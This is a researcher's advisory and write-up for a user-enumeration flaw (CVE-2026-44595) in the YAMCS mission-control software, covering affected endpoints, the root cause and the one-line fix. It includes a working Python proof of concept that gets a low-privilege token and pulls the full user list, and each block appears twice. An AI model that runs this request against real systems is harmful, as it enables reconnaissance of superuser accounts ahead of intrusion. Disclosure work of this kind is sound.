CVE-2026-44595 User enumeration in YAMCS

Severity: MEDIUM (CVSS 4.3)
Affected: yamcs-core < 5.12.7
Fixed in: yamcs-core 5.12.7
Advisory: GHSA-p2rj-mrmc-9w29

YAMCS has an IAM system with privilege levels. One of them is SystemPrivilege.ControlAccess supposed to gate access to user management endpoints. The IAM API has endpoints for listing users, getting user details, listing groups. All of them should require ControlAccess. None of them actually checked for it.

The issue

These endpoints return full user data to any authenticated user, regardless of privilege level:

GET /api/iam/users
GET /api/iam/users/{name}
GET /api/iam/groups
GET /api/iam/groups/{name}

GET /api/iam/users
GET /api/iam/users/{name}
GET /api/iam/groups
GET /api/iam/groups/{name}

Authenticate as a low-privilege operator account, call /api/iam/users, get this back:

{
  "users": [
    { "name": "admin", "superuser": true, "identities": [{ "provider": "ldap" }] },
    { "name": "operator", "superuser": false },
    { "name": "guest", "superuser": false }
  ]
}

{
  "users": [
    { "name": "admin", "superuser": true, "identities": [{ "provider": "ldap" }] },
    { "name": "operator", "superuser": false },
    { "name": "guest", "superuser": false }
  ]
}

With one request we can get the full user map, the superuser flags and auth provider.

Reproduction

import requests

resp = requests.post("http://localhost:8090/auth/token", data={
    "grant_type": "password",
    "username": "operator",
    "password": "operator"
})
token = resp.json()["access_token"]

resp = requests.get(
    "http://localhost:8090/api/iam/users",
    headers={"Authorization": f"Bearer {token}"}
)
print(resp.status_code)  # 200 — should be 403
print(resp.json())       # full user list

import requests

resp = requests.post("http://localhost:8090/auth/token", data={
    "grant_type": "password",
    "username": "operator",
    "password": "operator"
})
token = resp.json()["access_token"]

resp = requests.get(
    "http://localhost:8090/api/iam/users",
    headers={"Authorization": f"Bearer {token}"}
)
print(resp.status_code)  # 200 — should be 403
print(resp.json())       # full user list

Why it matters

User enumeration on its own is low severity. In context it’s more useful because you know exactly which accounts are superusers, which auth provider they use, and what the group structure looks like. Useful reconnaissance before going further.

In a mission control environment where YAMCS manages spacecraft commanding access, that information shouldn’t be available to anyone with a guest account.

Root cause

The SystemPrivilege.ControlAccess check was missing from the listUsers, getUser, listGroups and getGroup handlers in IamApi.java. The privilege system exists and works it just wasn’t called in these specific methods.

The fixed version of listUsers looks like this:

@Override
public void listUsers(Context ctx, Empty request, Observer<ListUsersResponse> observer) {
    ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // added in 5.12.7
    SecurityStore securityStore = YamcsServer.getServer().getSecurityStore();
    Directory directory = securityStore.getDirectory();
    List<User> users = directory.getUsers();
    // ...
}

@Override
public void listUsers(Context ctx, Empty request, Observer<ListUsersResponse> observer) {
    ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // added in 5.12.7
    SecurityStore securityStore = YamcsServer.getServer().getSecurityStore();
    Directory directory = securityStore.getDirectory();
    List<User> users = directory.getUsers();
    // ...
}

One line. ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess) throws HTTP 403 if the caller doesn’t have the required privilege. A basic and good solution.

The fix (yamcs-core 5.12.7)

ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess) added at the top of every affected handler.

PoC

github.com/ex-cal1bur/CVE-2026-44595

https://www.exploit-db.com/exploits/52604

Daniel Miranda Barcelona (Excal1bur) — GitHub · LinkedIn · thedumpster · portfolio